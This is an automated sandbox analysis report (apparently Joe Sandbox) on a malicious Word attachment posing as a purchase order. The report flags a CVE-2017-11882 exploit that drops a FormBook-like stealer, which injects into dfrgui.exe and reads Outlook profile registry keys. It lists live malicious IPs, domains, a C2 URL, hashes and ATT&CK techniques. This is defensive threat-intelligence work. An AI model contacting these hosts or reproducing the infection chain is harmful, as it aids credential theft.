            Source: C:\Windows\SysWOW64\dfrgui.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
            Source: C:\Windows\SysWOW64\dfrgui.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
            Source: C:\Windows\SysWOW64\dfrgui.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
            Source: C:\Windows\SysWOW64\dfrgui.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
            Source: C:\Windows\SysWOW64\dfrgui.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
            Source: C:\Windows\SysWOW64\dfrgui.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
            Source: C:\Windows\SysWOW64\dfrgui.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
            Source: C:\Windows\SysWOW64\dfrgui.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
            Source: C:\Windows\SysWOW64\dfrgui.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
            Source: C:\Windows\SysWOW64\dfrgui.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
            Source: C:\Windows\SysWOW64\dfrgui.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
            Source: C:\Windows\SysWOW64\dfrgui.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: C:\Windows\SysWOW64\dfrgui.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
            Source: C:\Windows\SysWOW64\dfrgui.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
            Source: C:\Windows\SysWOW64\dfrgui.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
            Source: C:\Windows\SysWOW64\dfrgui.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
            Source: C:\Windows\SysWOW64\dfrgui.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
            Source: C:\Windows\SysWOW64\dfrgui.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
            Source: C:\Windows\SysWOW64\dfrgui.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001

            Remote Access Functionality

            Source: Yara match File source: 6.2.op55336.scr.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 6.2.op55336.scr.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0000000E.00000002.479625649.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000008.00000002.847226726.00000000003A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000008.00000002.847107222.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000006.00000002.411272581.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000C.00000002.847699564.0000000004DB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000008.00000002.847192255.00000000002E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000006.00000002.412838071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000006.00000002.416629798.0000000001B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000007.00000002.847416646.0000000003360000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\dfrgui.exe Code function: 8_2_61E0337A sqlite3_value_frombind,8_2_61E0337A
            Source: C:\Windows\SysWOW64\dfrgui.exe Code function: 8_2_61E03463 sqlite3_bind_parameter_name,8_2_61E03463
            Source: C:\Windows\SysWOW64\dfrgui.exe Code function: 8_2_61E03451 sqlite3_bind_parameter_count,8_2_61E03451
            Source: C:\Windows\SysWOW64\dfrgui.exe Code function: 8_2_61E14411 sqlite3_bind_parameter_index,8_2_61E14411
            Source: C:\Windows\SysWOW64\dfrgui.exe Code function: 8_2_61E257EA sqlite3_bind_double,sqlite3_mutex_leave,8_2_61E257EA
            Source: C:\Windows\SysWOW64\dfrgui.exe Code function: 8_2_61E257C3 sqlite3_bind_text16,8_2_61E257C3
            Source: C:\Windows\SysWOW64\dfrgui.exe Code function: 8_2_61E25756 sqlite3_bind_text64,8_2_61E25756
            Source: C:\Windows\SysWOW64\dfrgui.exe Code function: 8_2_61E2572F sqlite3_bind_text,8_2_61E2572F
            Source: C:\Windows\SysWOW64\dfrgui.exe Code function: 8_2_61E1073D sqlite3_clear_bindings,sqlite3_mutex_enter,sqlite3_mutex_leave,8_2_61E1073D
            Source: C:\Windows\SysWOW64\dfrgui.exe Code function: 8_2_61E256E8 sqlite3_bind_blob64,8_2_61E256E8
            Source: C:\Windows\SysWOW64\dfrgui.exe Code function: 8_2_61E256C1 sqlite3_mutex_leave,sqlite3_bind_blob,8_2_61E256C1
            Source: C:\Windows\SysWOW64\dfrgui.exe Code function: 8_2_61E259F3 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_blob,8_2_61E259F3
            Source: C:\Windows\SysWOW64\dfrgui.exe Code function: 8_2_61E25986 sqlite3_bind_zeroblob,sqlite3_mutex_leave,8_2_61E25986
            Source: C:\Windows\SysWOW64\dfrgui.exe Code function: 8_2_61E25909 sqlite3_bind_pointer,sqlite3_mutex_leave,8_2_61E25909
            Source: C:\Windows\SysWOW64\dfrgui.exe Code function: 8_2_61E258D8 sqlite3_bind_null,sqlite3_mutex_leave,8_2_61E258D8
            Source: C:\Windows\SysWOW64\dfrgui.exe Code function: 8_2_61E258B2 sqlite3_bind_int,sqlite3_bind_int64,8_2_61E258B2
            Source: C:\Windows\SysWOW64\dfrgui.exe Code function: 8_2_61E1088D sqlite3_mutex_enter,sqlite3_mutex_leave,sqlite3_transfer_bindings,8_2_61E1088D
            Source: C:\Windows\SysWOW64\dfrgui.exe Code function: 8_2_61E25863 sqlite3_bind_int64,sqlite3_mutex_leave,8_2_61E25863
            Source: C:\Windows\SysWOW64\dfrgui.exe Code function: 8_2_61E25ADA sqlite3_bind_zeroblob64,sqlite3_mutex_enter,sqlite3_bind_zeroblob,sqlite3_mutex_leave,8_2_61E25ADA
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | 11 Disable or Modify Tools | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 11 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
            Credentials | Domains | Default Accounts | 33 Exploitation for Client Execution | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 11 Deobfuscate/Decode Files or Information | LSASS Memory | 1 File and Directory Discovery | Remote Desktop Protocol | 1 Browser Session Hijacking | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 312 Process Injection | 1 Abuse Elevation Control Mechanism | Security Account Manager | 16 System Information Discovery | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 31 Obfuscated Files or Information | NTDS | 1 Query Registry | Distributed Component Object Model | 1 Email Collection | 5 Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Install Root Certificate | LSA Secrets | 21 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Software Packing | Cached Domain Credentials | 2 Process Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Timestomp | DCSync | 41 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 11 Masquerading | /etc/passwd and /etc/shadow | 1 Remote System Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
            IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 Modify Registry | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
            Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 41 Virtualization/Sandbox Evasion | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
            Gather Victim Org Information | DNS Server | Compromise Software Supply Chain | Windows Command Shell | Scheduled Task | Scheduled Task | 312 Process Injection | Keylogging | Process Discovery | Taint Shared Content | Screen Capture | DNS | Exfiltration Over Physical Medium | Resource Hijacking
            Behavior Graph ID: 1435172, Sample: MOQ010524Purchase order.doc, Startdate: 02/05/2024, Architecture: WINDOWS, Score: 100

            Source | Detection | Scanner | Label
            MOQ010524Purchase order.doc | 42% | Virustotal |
            MOQ010524Purchase order.doc | 37% | ReversingLabs | Document-RTF.Exploit.CVE-2017-11882

            Source | Detection | Scanner | Label
            C:\Users\user\AppData\Roaming\op55336.scr | 100% | Joe Sandbox ML |
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\opp[1].scr | 100% | Joe Sandbox ML |
            C:\Users\user\AppData\Local\Temp\sqlite3.dll | 0% | ReversingLabs |

            No Antivirus matches
                                                                  unknown
                                                                  http://jnkinteractive.co.kr/ufuh/?pl=EbiRYmriZV7/HiPUOKeH2YEx7MyTQrgkk6gsaa5XxsDKCOU8Ma1/AS5omL8UMRhdfrgui.exe, 00000008.00000002.847604345.0000000003B98000.00000004.10000000.00040000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.0000000003D18000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=padfrgui.exe, 00000008.00000002.847604345.000000000322C000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847986482.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000033AC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    high
                                                                    https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=padfrgui.exe, 00000008.00000002.847604345.000000000322C000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847986482.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000033AC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      high
                                                                      https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkindfrgui.exe, 00000008.00000002.847604345.000000000322C000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847986482.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000033AC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        high
                                                                        https://secure.comodo.com/CPS0EQNEDT32.EXE, 00000002.00000002.349581619.00000000006E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=dfrgui.exe, 00000008.00000003.468221206.0000000005F9E000.00000004.00000020.00020000.00000000.sdmp, 13d6pS3.8.drfalse
                                                                            high
                                                                            http://crl.entrust.net/2048ca.crl0EQNEDT32.EXE, 00000002.00000002.349581619.00000000006E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=padfrgui.exe, 00000008.00000002.847604345.000000000322C000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847986482.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000033AC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                high
                                                                                https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwebdfrgui.exe, 00000008.00000002.847604345.000000000322C000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847986482.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000033AC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=dfrgui.exe, 00000008.00000003.468221206.0000000005F9E000.00000004.00000020.00020000.00000000.sdmp, 13d6pS3.8.drfalse
                                                                                    high
                                                                                    • No. of IPs < 25%
                                                                                    • 25% < No. of IPs < 50%
                                                                                    • 50% < No. of IPs < 75%
                                                                                    • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
194.9.94.86 | www.xn--matfrmn-jxa4m.se | Sweden | 39570 | LOOPIASE | true
45.33.6.223 | www.sqlite.org | United States | 63949 | LINODE-APLinodeLLCUS | false
104.21.74.191 | universalmovies.top | United States | 13335 | CLOUDFLARENETUS | true
154.41.250.58 | www.ibistradingco.com.cdn.hstgr.net | United States | 174 | COGENT-174US | true
94.23.162.163 | www.kinkynerdspro.blog | France | 16276 | OVHFR | true
198.12.241.35 | aceautocorp.com | United States | 26496 | AS-26496-GO-DADDY-COM-LLCUS | true
91.195.240.19 | parkingpage.namecheap.com | Germany | 47846 | SEDO-ASDE | false
208.91.197.13 | www.riveramayahousing.com | Virgin Islands (BRITISH) | 40034 | CONFLUENCE-NETWORK-INCVG | true
67.223.117.189 | www.touchclean.top | United States | 15189 | VIMRO-AS15189US | true
183.111.183.31 | jnkinteractive.co.kr | Korea Republic of | 4766 | KIXS-AS-KRKoreaTelecomKR | true
66.96.161.166 | www.terelprime.com | United States | 29873 | BIZLAND-SDUS | true
                                                                                    IP
                                                                                    192.168.2.255
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1435172
Start date and time: 2024-05-02 08:25:18 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 27s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed: 14
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: MOQ010524Purchase order.doc
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winDOC@11/15@22/12
EGA Information:
• Successful, ratio: 60%
HCA Information:
• Successful, ratio: 74%
• Number of executed functions: 47
• Number of non-executed functions: 188
Cookbook Comments:
• Found application associated with file extension: .doc
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Active ActiveX Object
• Scroll down
• Close Viewer
• Override analysis time to 70165.1630776322 for current running targets taking high CPU consumption
• Override analysis time to 140330.326155264 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, svchost.exe
• Execution Graph export aborted for target EQNEDT32.EXE, PID 1808 because there are no executed function
• HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
08:26:04 | API Interceptor | 266x Sleep call for process: EQNEDT32.EXE modified
08:26:08 | API Interceptor | 5x Sleep call for process: op55336.scr modified
08:26:50 | API Interceptor | 18586x Sleep call for process: eDTvjJMLUGCaWhgZ.exe modified
08:27:00 | API Interceptor | 7623161x Sleep call for process: dfrgui.exe modified
                                                                                    LOOPIASESalinaGroup.docGet hashmaliciousFormBookBrowse
                                                                                    • 194.9.94.86
                                                                                    NEW-ORDER_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                    • 194.9.94.85
                                                                                    alhadani Aprilorders140424.scr.exeGet hashmaliciousFormBookBrowse
                                                                                    • 194.9.94.85
                                                                                    AWB5889829680.scr.exeGet hashmaliciousFormBookBrowse
                                                                                    • 194.9.94.85
                                                                                    Search.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                    • 194.9.94.85
                                                                                    PAY-0129.exeGet hashmaliciousFormBookBrowse
                                                                                    • 194.9.94.86
                                                                                    PgbcaAGOnA.exeGet hashmaliciousFormBookBrowse
                                                                                    • 194.9.94.85
                                                                                    admindemo.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                    • 194.9.94.85
                                                                                    Order_N#U00b0_202200027.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                    • 194.9.94.85
                                                                                    CamScanner_12-12-2023_01.03.exeGet hashmaliciousFormBook, zgRATBrowse
                                                                                    • 194.9.94.85
                                                                                    COGENT-174USaduLTc2Dny.elfGet hashmaliciousMiraiBrowse
                                                                                    • 38.247.148.219
                                                                                    SecuriteInfo.com.Win64.PWSX-gen.20556.23749.exeGet hashmaliciousFormBookBrowse
                                                                                    • 38.63.111.149
                                                                                    SecuriteInfo.com.Win32.PWSX-gen.7200.9677.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                    • 38.47.232.37
                                                                                    vylI38MZOn.elfGet hashmaliciousMiraiBrowse
                                                                                    • 38.144.30.229
                                                                                    mcEX8uqMA9.elfGet hashmaliciousMiraiBrowse
                                                                                    • 154.42.69.230
                                                                                    L31owFeEHg.elfGet hashmaliciousMiraiBrowse
                                                                                    • 38.192.195.72
                                                                                    nAgY4qjFwu.elfGet hashmaliciousUnknownBrowse
                                                                                    • 154.44.30.231
                                                                                    jDrEk4Z8cP.elfGet hashmaliciousUnknownBrowse
                                                                                    • 154.44.30.231
                                                                                    S8XVPpU2wq.elfGet hashmaliciousUnknownBrowse
                                                                                    • 154.44.30.231
                                                                                    DQUOFZJDd5.elfGet hashmaliciousUnknownBrowse
                                                                                    • 154.44.30.231
                                                                                    OVHFRhttps://herozheng.com/Get hashmaliciousUnknownBrowse
                                                                                    • 147.135.94.220
                                                                                    H0RZizYUEv.elfGet hashmaliciousMiraiBrowse
                                                                                    • 142.44.233.39
                                                                                    hPEMPaXhhr.exeGet hashmaliciousRedLineBrowse
                                                                                    • 54.39.249.56
                                                                                    lNUsUO1sge.elfGet hashmaliciousMiraiBrowse
                                                                                    • 192.99.71.250
                                                                                    Specification 1223.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                    • 139.99.5.44
                                                                                    SalinaGroup.docGet hashmaliciousFormBookBrowse
                                                                                    • 54.38.220.85
                                                                                    RFQ.xlsm.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                    • 178.33.249.251
                                                                                    ORDER-290424-007994PT.vbsGet hashmaliciousWSHRat, AgentTeslaBrowse
                                                                                    • 51.254.27.105
                                                                                    arm7.elfGet hashmaliciousMiraiBrowse
                                                                                    • 37.59.96.160
                                                                                    Orders-2604_24.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                    • 139.99.5.44
                                                                                    LINODE-APLinodeLLCUSEMPLOYEE-FINAL-SETTLEMENTS.docGet hashmaliciousFormBookBrowse
                                                                                    • 45.33.6.223
                                                                                    SecuriteInfo.com.Program.Unwanted.4826.21447.30958.exeGet hashmaliciousUnknownBrowse
                                                                                    • 45.33.97.245
                                                                                    SecuriteInfo.com.Program.Unwanted.4826.21447.30958.exeGet hashmaliciousUnknownBrowse
                                                                                    • 45.33.97.245
                                                                                    https://www.canva.com/design/DAGEAa4PcvI/o5lifZGBI-4kJErApUzUSw/view?utm_content=DAGEAa4PcvI&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                                                                                    • 45.56.122.121
                                                                                    https://www.canva.com/design/DAGEAa4PcvI/o5lifZGBI-4kJErApUzUSw/view?utm_content=DAGEAa4PcvI&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousHTMLPhisherBrowse
                                                                                    • 45.56.122.121
                                                                                    https://cushwake.radiacellar.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                    • 104.237.130.23
                                                                                    confirmation de cuenta.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                    • 139.162.5.234
                                                                                    SalinaGroup.docGet hashmaliciousFormBookBrowse
                                                                                    • 45.33.6.223
                                                                                    FV- 12.429#U00a0TUSOCAL.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                    • 139.162.5.234
                                                                                    FV- 12.429#U00a0TUSOCAL.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                    • 139.162.5.234
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    7dcce5b76c8b17472d024758970a406bEMPLOYEE-FINAL-SETTLEMENTS.docGet hashmaliciousFormBookBrowse
                                                                                    • 104.21.74.191
                                                                                    Account report (1).docxGet hashmaliciousUnknownBrowse
                                                                                    • 104.21.74.191
                                                                                    Account report (1).docxGet hashmaliciousUnknownBrowse
                                                                                    • 104.21.74.191
                                                                                    documento.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                    • 104.21.74.191
                                                                                    nU7Z8sPyvf.rtfGet hashmaliciousRemcosBrowse
                                                                                    • 104.21.74.191
                                                                                    QF3YL9rOxB.rtfGet hashmaliciousAgentTeslaBrowse
                                                                                    • 104.21.74.191
                                                                                    GENERALCANDY INV FWDRB42024.docGet hashmaliciousLokibotBrowse
                                                                                    • 104.21.74.191
                                                                                    citat-05012024.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                    • 104.21.74.191
                                                                                    cotizaci#U00f3n_04302024.xla.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                    • 104.21.74.191
                                                                                    RFQ-37463746374634.xlsGet hashmaliciousUnknownBrowse
                                                                                    • 104.21.74.191
Match: C:\Users\user\AppData\Local\Temp\sqlite3.dll
Associated Sample Name / URL | Detection | Threat Name
maildatas.xls | malicious | FormBook, GuLoader
5890796959.xls | malicious | FormBook
DlXCfRPdLr.rtf | malicious | FormBook
NEW_ORDER.xls | malicious | FormBook
                                                                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):636928
                                                                                            Entropy (8bit):7.634194042962642
                                                                                            Encrypted:false
                                                                                            SSDEEP:6144:6ZZcyAHUylUe/tDISmWNf1hAY7PFVSz2NYKcV4v9yf+29EfaGT/T95BGjNBukNFy:CKlUKV7l7PFAz2NNHwu1T/T98BuZ
                                                                                            MD5:3CCB984FD28AFEA83F2F2E8A6ED4CCFA
                                                                                            SHA1:AC0EC507CC8D749FD5FC5E59257856BCD5492E42
                                                                                            SHA-256:57243762AAFFC5CAB1DC4A9E630DB4D4E5D9F746141650CB7E4F78629F7C065D
                                                                                            SHA-512:02BBCDBAD66A138D9C749F4F95FF5BEEBEB2C74D8D244277CAC2795870005866C1D4BF9CCD03B370021F7218D6A0280D8FF8786D3FB0B64A7CFC4D1A3A0E085B
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            Reputation:low
                                                                                            Process:C:\Windows\SysWOW64\dfrgui.exe
                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                            Category:dropped
                                                                                            Size (bytes):486020
                                                                                            Entropy (8bit):7.998960424234155
                                                                                            Encrypted:true
                                                                                            SSDEEP:12288:EKlJSZA7zQtl7IZyBgByo77WNMzTSZJVahsC:roZKzQtl7IZyqBy278pJVahsC
                                                                                            MD5:AF10A982A2EF91C9787106EEA1A0CC4A
                                                                                            SHA1:00435A36F5E6059287CDE2CEBB2882669CDBA3A5
                                                                                            SHA-256:E028068B067E5E60FA5680B0BAFA48A31287B6D614EE0B92DF51CCE23B974099
                                                                                            SHA-512:73D0D3034405527798B854DC33FC608C7CCF0AF1689E139AF4BBB5A5324DC0748BDC2BF632468745920DC7BE4EB7F0240D3CF1B5872D3F5C0C897725DB78BF9F
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):16384
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3::
                                                                                            MD5:CE338FE6899778AACFC28414F2D9498B
                                                                                            SHA1:897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
                                                                                            SHA-256:4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
                                                                                            SHA-512:6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
                                                                                            Malicious:false
                                                                                            Reputation:high, very likely benign file
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):92672
                                                                                            Entropy (8bit):3.502882394803038
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:IgI2Q5Q6IQXwvW5Kq2g05gI2Q5Q6IQXwvW5Kq2g05gI2Q5Q6IQXwvW5Kq2g05gIN:LSyemuSyemuSyemuSyemuSyemF0CxR
                                                                                            MD5:68325691EAED8CBC078A8CFB9CE23933
                                                                                            SHA1:A8AB491DE1D2BAECAF8B838ACDBFDFEE75A2856B
                                                                                            SHA-256:7ADDC8AF01F9F395CADCDD5D21A6132696E8505FA243054383882A1B03B6E33B
